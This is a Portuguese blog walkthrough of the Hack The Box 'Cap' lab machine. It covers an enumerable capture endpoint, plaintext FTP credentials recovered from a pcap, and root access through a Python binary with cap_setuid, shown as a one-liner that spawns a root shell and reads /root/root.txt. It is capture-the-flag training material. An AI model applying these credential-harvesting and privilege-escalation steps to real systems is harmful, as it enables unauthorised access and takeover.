Service Info: OSs: Unix, Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>137.56 seconds
</code></pre></div></div>

<h3 id="80tcp---serviço-http">80/TCP - Serviço HTTP</h3>

<p>Observando a página publicada, podemos ver um painel de monitoramento, com algumas opções à esquerda.</p>

<p><img src="https://i.imgur.com/EVJpbpL.png" alt="HTB Cap - Security Dashboard" class="align-center"></p>

<p>Inspecionando as opções disponíveis no painel da esquerda, a única funcionalidade interessante foi o <em>Security Snapshot (5 Second PCAP + Analysis)</em>, que sumariza o resultado da coleta de pacotes de comunicação de rede por 5 segundos. Ao selecionar esta opção somos redirecionados para <code class="language-plaintext highlighter-rouge">http://10.10.10.245/capture</code> e logo após 5 segundos, para uma página que exibe os resultados da coleta, neste caso <code class="language-plaintext highlighter-rouge">http://10.10.10.245/data/1</code>. Nesta página também podemos baixar o arquivo <code class="language-plaintext highlighter-rouge">pcap</code> gerado, que poderia ser analizado via linha de comando ou via Wireshark.</p>

<p><img src="https://i.imgur.com/YaUXZ83.png" alt="HTB Cap - Security Snapshot" class="align-center"></p>

<p>Um ponto interessante é que quando solicitei uma nova captura, a URL de resultado apresentou um número sequencial  (<code class="language-plaintext highlighter-rouge">http://10.10.10.245/data/2</code>), que significa que poderíamos ver outras capturas geradas por terceiros em outro momento.</p>

<p>Considerando que o contador está incrementando, devemos ter algo registrado na entrada “0”, a qual foi confirmada alterando manualmente o endereço na URL onde os status mostram que houve comunicação dado a quantidade de pacotes, podendo existir algum tipo de dado sensível caso a comunicação não tenha ocorrido de forma segura.</p>

<p><img src="https://i.imgur.com/WWyXVKE.png" alt='HTB Cap - Security Snapshot "zero"' class="align-center"></p>

<p>Analizando o conteúdo utilizando o Wireshark, iniciei por verificar as estatísticas das conversas, conforme abaixo, onde temos 3 streams HTTP (80/TCP) e um para FTP (21/TCP)</p>

<p><img src="https://i.imgur.com/XR922yh.png" alt="HTB Cap - PCAP Statistics" class="align-center"></p>

<p>Passando por cada um dos TCP streams, o mais interessante foi o último, em que durante a comunicação FTP podemos ver as credenciais informadas pelo usuário <strong>nathan</strong> que baixou o arquivo <code class="language-plaintext highlighter-rouge">notes.txt</code>, que poderia conter algum tipo de informação relevante para a resoluçào da máquina.</p>

<blockquote>
  <p>nathan:Buck3tH4TF0RM3!</p>
</blockquote>

<p><img src="https://i.imgur.com/DQHsTTw.png" alt="HTB Cap - PCAP FTP Stream" class="align-center"></p>

<h2 id="acesso-inicial-e-user-flag">Acesso inicial e User flag</h2>

<p>Utilizando as credenciais observadas, consegui conectar via FTP e surpreendentemente o diretório raiz da conexão era o home directory de <code class="language-plaintext highlighter-rouge">nathan</code>, onde pude baixar o arquivo <code class="language-plaintext highlighter-rouge">user.txt</code> e ler a flag.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>ftp 10.10.10.245
Connected to 10.10.10.245.
220 <span class="o">(</span>vsFTPd 3.0.3<span class="o">)</span>
Name <span class="o">(</span>10.10.10.245:zurc<span class="o">)</span>: nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system <span class="nb">type </span>is UNIX.
Using binary mode to transfer files.
ftp&gt; <span class="nb">ls</span> <span class="nt">-la</span>
200 PORT <span class="nb">command </span>successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 1001     1001         4096 May 27 09:16 <span class="nb">.</span>
drwxr-xr-x    3 0        0            4096 May 23 19:17 ..
lrwxrwxrwx    1 0        0               9 May 15 21:40 .bash_history -&gt; /dev/null
<span class="nt">-rw-r--r--</span>    1 1001     1001          220 Feb 25  2020 .bash_logout
<span class="nt">-rw-r--r--</span>    1 1001     1001         3771 Feb 25  2020 .bashrc
drwx------    2 1001     1001         4096 May 23 19:17 .cache
<span class="nt">-rw-r--r--</span>    1 1001     1001          807 Feb 25  2020 .profile
lrwxrwxrwx    1 0        0               9 May 27 09:16 .viminfo -&gt; /dev/null
<span class="nt">-r--------</span>    1 1001     1001           33 Aug 11 16:25 user.txt
226 Directory send OK.
ftp&gt; get user.txt
<span class="nb">local</span>: user.txt remote: user.txt
200 PORT <span class="nb">command </span>successful. Consider using PASV.
150 Opening BINARY mode data connection <span class="k">for </span>user.txt <span class="o">(</span>33 bytes<span class="o">)</span><span class="nb">.</span>
226 Transfer complete.
33 bytes received <span class="k">in </span>0.00 secs <span class="o">(</span>358.0729 kB/s<span class="o">)</span>
ftp&gt; <span class="nb">exit
</span>221 Goodbye.

<span class="nv">$ </span><span class="nb">cat </span>user.txt
&lt;redacted&gt;
</code></pre></div></div>

<h2 id="root-flag">Root flag</h2>

<p>Após ler a flag de usuário, fiz uma tentativa com as mesmas credenciais via SSH e tive o sucesso esperado, onde pbtive um acesso interativo na máquina.</p>

<p>A primeira ação sempre executada como sempre é <code class="language-plaintext highlighter-rouge">sudo -l</code> mas, para a conta do usuário <code class="language-plaintext highlighter-rouge">nathan</code> nada foi retornado. Seguindo com a enumeração manual, decidi checar se tinhamos acesso ao diretório da aplicação, que está localizado no caminho padrão do apache (<code class="language-plaintext highlighter-rouge">/var/www/html</code>) e de que se trata de uma aplicação web baseada em Python a partir do arquivo <code class="language-plaintext highlighter-rouge">app.py</code>, par ao qual o usuário <code class="language-plaintext highlighter-rouge">nathan</code> tem acesso de gravação.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nathan@cap:/var/www/html<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span>
total 32
drwxr-xr-x 6 nathan nathan 4096 May 25 07:25 <span class="nb">.</span>
drwxr-xr-x 3 root   root   4096 May 23 19:17 ..
drwxr-xr-x 2 nathan nathan 4096 May 27 09:10 __pycache__
<span class="nt">-rw-r--r--</span> 1 nathan nathan 4293 May 25 07:25 app.py
drwxr-xr-x 6 root   root   4096 May 23 19:17 static
drwxr-xr-x 2 root   root   4096 May 23 19:17 templates
drwxr-xr-x 2 root   root   4096 May 31 16:17 upload
</code></pre></div></div>

<p>Ao avaliar o conteúdo do arquivo, uma das funções executa o arquivo <code class="language-plaintext highlighter-rouge">tcpdump</code>, que normalmente requer privilégios de <code class="language-plaintext highlighter-rouge">root</code>. Esta permissão poderia ser abusada e utilizá-la para obter um shell reverso a partir de uma conta privilegiada.</p>

<p>Para testar isso, criei uma outra rota no app, com um caminho customizado mas, para ser efetivo, precisaria reiniciar o website em python, o que não é feito automaticamente e não tenho privilégios suficientes para tal tarefa.</p>

<p>Olhando mais a fundo, decidi executar o <code class="language-plaintext highlighter-rouge">linpeas.sh</code> e encontrei uma configuração que poderia nos auxiliar com a escalação de privilégio: alguns <strong>arquivos contém alguns capabilities não comuns</strong>, que foram validados em um segundo momento no GTFOBins:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
Current capabilities:
Current: =
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000

Shell capabilities:
0x0000000000000000=
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000

Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
</code></pre></div></div>

<p>Dos arquivos listados o mais promissor é o <code class="language-plaintext highlighter-rouge">/usr/bin/python3.8</code> que possui o capability <code class="language-plaintext highlighter-rouge">cap_setuid</code> configurado, que, de acordo com o <a href="https://gtfobins.github.io/gtfobins/python/#capabilities">python | GTFOBins</a> poderia nos permitir iniciar uma nova instancia do <code class="language-plaintext highlighter-rouge">/bin/sh</code> e, a partir desta, ler o conteúdo do arquivo flag do usuário <code class="language-plaintext highlighter-rouge">root</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nathan@cap:~<span class="nv">$ </span>/usr/bin/python3.8 <span class="nt">-c</span> <span class="s1">'import os; os.setuid(0); os.system("/bin/sh")'</span>
<span class="c"># id &amp;&amp; hostname &amp;&amp; cat /root/root.txt</span>
<span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1001<span class="o">(</span>nathan<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1001<span class="o">(</span>nathan<span class="o">)</span>
cap
&lt;redacted&gt;
</code></pre></div></div>

<p>Espero que tenham gostado!</p>

<p>Vejo vocês no próximo post <img class="emoji" title=":smile:" alt=":smile:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f604.png" height="20" width="20"></p>

        
      </section>

      <footer class="page__meta">
        
        
  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-tags" aria-hidden="true"></i> Tags: </strong>
    <span itemprop="keywords">
    
      <a href="/tags/#hackthebox" class="page__taxonomy-item p-category" rel="tag">HackTheBox</a><span class="sep">, </span>
    
      <a href="/tags/#htb-easy" class="page__taxonomy-item p-category" rel="tag">HTB Easy</a><span class="sep">, </span>
    
      <a href="/tags/#htb-linux" class="page__taxonomy-item p-category" rel="tag">HTB Linux</a>
    
    </span>
  </p>




  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-folder-open" aria-hidden="true"></i> Categorias: </strong>
    <span itemprop="keywords">
    
      <a href="/categorias/#walkthrough" class="page__taxonomy-item p-category" rel="tag">Walkthrough</a>
    
    </span>
  </p>


        

  <p class="page__date"><strong><i class="fas fa-fw fa-calendar-alt" aria-hidden="true"></i> Atualizado em:</strong> <time class="dt-published" datetime="2021-10-02T13:00:00-03:00">October 2, 2021</time></p>

      </footer>

      <section class="page__share" id="sharelinks">
  
    <h4 class="page__share-title">Compartilhe</h4>
  

  <!-- CUSTOM: Localized sharing links -->
  

  <a href="https://twitter.com/intent/tweet?via=zerahzurc&amp;text=Walktrough%3A+HTB+Cap%20https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F10%2Fhtb-cap" class="btn btn--twitter" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Compartilhe Twitter"><i class="fab fa-fw fa-twitter" aria-hidden="true"></i><span> Twitter</span></a>

  <a href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F10%2Fhtb-cap" class="btn btn--facebook" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Compartilhe Facebook"><i class="fab fa-fw fa-facebook" aria-hidden="true"></i><span> Facebook</span></a>

  <a href="https://www.linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F10%2Fhtb-cap" class="btn btn--linkedin" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Compartilhe LinkedIn"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i><span> LinkedIn</span></a>

  <a href="whatsapp://send?text=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F10%2Fhtb-cap" data-action="share/whatsapp/share" class="btn btn--whatsapp" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Compartilhe Whatsapp"><i class="fab fa-fw fa-whatsapp" aria-hidden="true"></i><span> Whatsapp</span></a>

  <a href="https://telegram.me/share/url?url=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F10%2Fhtb-cap&amp;text=Walktrough%3A+HTB+Cap" class="btn btn--telegram" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Compartilhe Telegram"><i class="fab fa-fw fa-telegram-plane" aria-hidden="true"></i><span> Telegram</span></a>

  <!-- END CUSTOM: Localized sharing links -->
</section>


      
  <nav class="pagination">
    
    
      <a href="/walkthrough/2021/09/htb-pit" class="pagination--pager" title="Walktrough: HTB Pit
">Anterior</a>
    
    
    
      
        <a href="/walkthrough/2021/10/htb-dynstr" class="pagination--pager" title="Walktrough: HTB Dynstr
">Próxima</a>
      
    
  </nav>

    </div>

    
      <div class="page__comments">
  
  
      <h4 class="page__comments-title">Deixe um comentário</h4>
      <section id="utterances-comments"></section>
    
</div>

    
  </article>

  
  
    <div class="page__related">
      <h2 class="page__related-title">Talvez você também goste</h2>
      <div class="grid__wrapper">
        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/TJKS5F6.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      
      
        <a href="/walkthrough/2021/10/htb-explore" rel="permalink">Walktrough: HTB Explore
</a>
      
      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-10-30T13:00:00-03:00">October 30, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          4 minuto(s) de leitura
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    
    
    <span class="page__meta-lang"><a href="/en-US/walkthrough/2021/10/htb-cap">Read also in  <img class="emoji" title=":us:" alt=":us:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1fa-1f1f8.png" height="20" width="20"></a></span>
    

    

    

    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Compartilhar</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Olá pessoal!

A máquina desta semana será Explore, uma máquina Android classificada como fácil do Hack The Box, criada por bertolis.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/89b1SdH.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      
      
        <a href="/walkthrough/2021/10/htb-dynstr" rel="permalink">Walktrough: HTB Dynstr
</a>
      
      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-10-16T13:00:00-03:00">October 16, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          10 minuto(s) de leitura
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    
    
    <span class="page__meta-lang"><a href="/en-US/walkthrough/2021/10/htb-cap">Read also in  <img class="emoji" title=":us:" alt=":us:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1fa-1f1f8.png" height="20" width="20"></a></span>
    

    

    

    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Compartilhar</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Olá pessoal!

A máquina desta semana será Dynstr, outra máquina Linux classificada como mediana do Hack The Box, criada por jkr.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/pUqq7fY.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      
      
        <a href="/walkthrough/2021/09/htb-pit" rel="permalink">Walktrough: HTB Pit
</a>
      
      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-09-25T09:00:00-03:00">September 25, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          13 minuto(s) de leitura
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    
    
    <span class="page__meta-lang"><a href="/en-US/walkthrough/2021/10/htb-cap">Read also in  <img class="emoji" title=":us:" alt=":us:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1fa-1f1f8.png" height="20" width="20"></a></span>
    

    

    

    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Compartilhar</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Olá pessoal!

A máquina desta semana será Pit, outra máquina Linux classificada como mediana Hack The Box, criada por polarbearer e GibParadox.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/ksBoJIQ.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      
      
        <a href="/walkthrough/2021/09/htb-schooled" rel="permalink">Walktrough: HTB Schooled
</a>
      
      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-09-11T00:00:00-03:00">September 11, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          12 minuto(s) de leitura
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    
    
    <span class="page__meta-lang"><a href="/en-US/walkthrough/2021/10/htb-cap">Read also in  <img class="emoji" title=":us:" alt=":us:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1fa-1f1f8.png" height="20" width="20"></a></span>
    

    

    

    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Compartilhar</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Olá pessoal!

A máquina desta semana será Schooled, outra máquina Linux classificada como mediana do Hack The Box, criada por TheCyberGeek.
</p>
  </article>
</div>

        
      </div>
    </div>
  
  
</div>

    </div>

    
      <div class="search-content">
        <div class="search-content__inner-wrap">
<form class="search-content__form" onkeydown="return event.key != 'Enter';" role="search">
    <label class="sr-only" for="search">
      Digite seu termo de busca...
    </label>
    <input type="search" id="search" class="search-input" tabindex="-1" placeholder="Digite seu termo de busca...">
  </form>
  <div id="results" class="results"></div>
</div>

      </div>
    

    <div id="footer" class="page__footer">
      <footer>
        <!-- start custom footer snippets -->

<!-- Mermaid.js -->
<script type="module">
    import mermaid from 'https://unpkg.com/mermaid@9/dist/mermaid.esm.min.mjs';
    const config = {
        "theme": "dark", 
        "startOnLoad": true
    };
    mermaid.initialize(config);
</script>

<!-- end custom footer snippets -->
        <div class="page__footer-follow">
  <ul class="social-icons">
    
      <li><strong>Siga:</strong></li>
    

    
      
        
          <li><a href="https://www.linkedin.com/in/davicruz" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i> Linkedin</a></li>
        
      
        
          <li><a href="https://twitter.com/zerahzurc" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-twitter-square" aria-hidden="true"></i> Twitter</a></li>
        
      
        
          <li><a href="https://github.com/davi-cruz" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-github" aria-hidden="true"></i> GitHub</a></li>
        
      
    
    <!-- start custom: Fix Atom Feed, add Privacy, Consent and Read in other languages -->
    
      <li><a href="/feed.xml"><i class="fas fa-fw fa-rss-square" aria-hidden="true"></i> Feed</a></li>
    
    <li><a href="https://davicruz.com/termos-e-privacidade" rel="nofollow noopener noreferrer"><i class="fas fa-user-shield" aria-hidden="true"></i> Termos de uso e Política Privacidade</a></li>
    <!--<li><a onclick="return klaro.show();"><i class="fas fa-shield-alt" aria-hidden="true"></i> Revisar consentimento</a></li>-->
    
      
    
      
        
          <li><a href="/en-US">Also available in  <img class="emoji" title=":us:" alt=":us:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1fa-1f1f8.png" height="20" width="20"></a></li>
        
        
        
      
    
    <!-- end custom: Fix Atom Feed, add Privacy, Consent and Read in other languages -->
  </ul>
</div>

<div class="page__footer-copyright">© 2023 Davi Cruz. Desenvolvido com <a href="https://jekyllrb.com" rel="nofollow">Jekyll</a> &amp; <a href="https://mademistakes.com/work/minimal-mistakes-jekyll-theme/" rel="nofollow">Minimal Mistakes</a> &amp; <a href="https://github.com/kurtsson/jekyll-multiple-languages-plugin" rel="nofollow">Multiple Languages Plugin</a>.</div>

      </footer>
    </div>

    
  <script src="/assets/js/main.min.js"></script>




<script src="/assets/js/lunr/lunr.min.js"></script>
<script src="/assets/js/lunr/lunr-store.js"></script>
<script src="/assets/js/lunr/lunr-en.js"></script>




  <!-- start custom analytics snippet -->

<!-- end custom analytics snippet -->





    <script>
  'use strict';

  (function() {
    var commentContainer = document.querySelector('#utterances-comments');

    if (!commentContainer) {
      return;
    }

    var script = document.createElement('script');
    script.setAttribute('src', 'https://utteranc.es/client.js');
    script.setAttribute('repo', 'davi-cruz/davi-cruz-blog');
    // CUSTOM : Utterances post mapping due to Jekyll Multilanguage
    script.setAttribute('issue-term', 'htb-cap');
    
    script.setAttribute('theme', 'github-dark');
    script.setAttribute('crossorigin', 'anonymous');

    commentContainer.appendChild(script);
  })();
</script>

  





  </body>
</html>
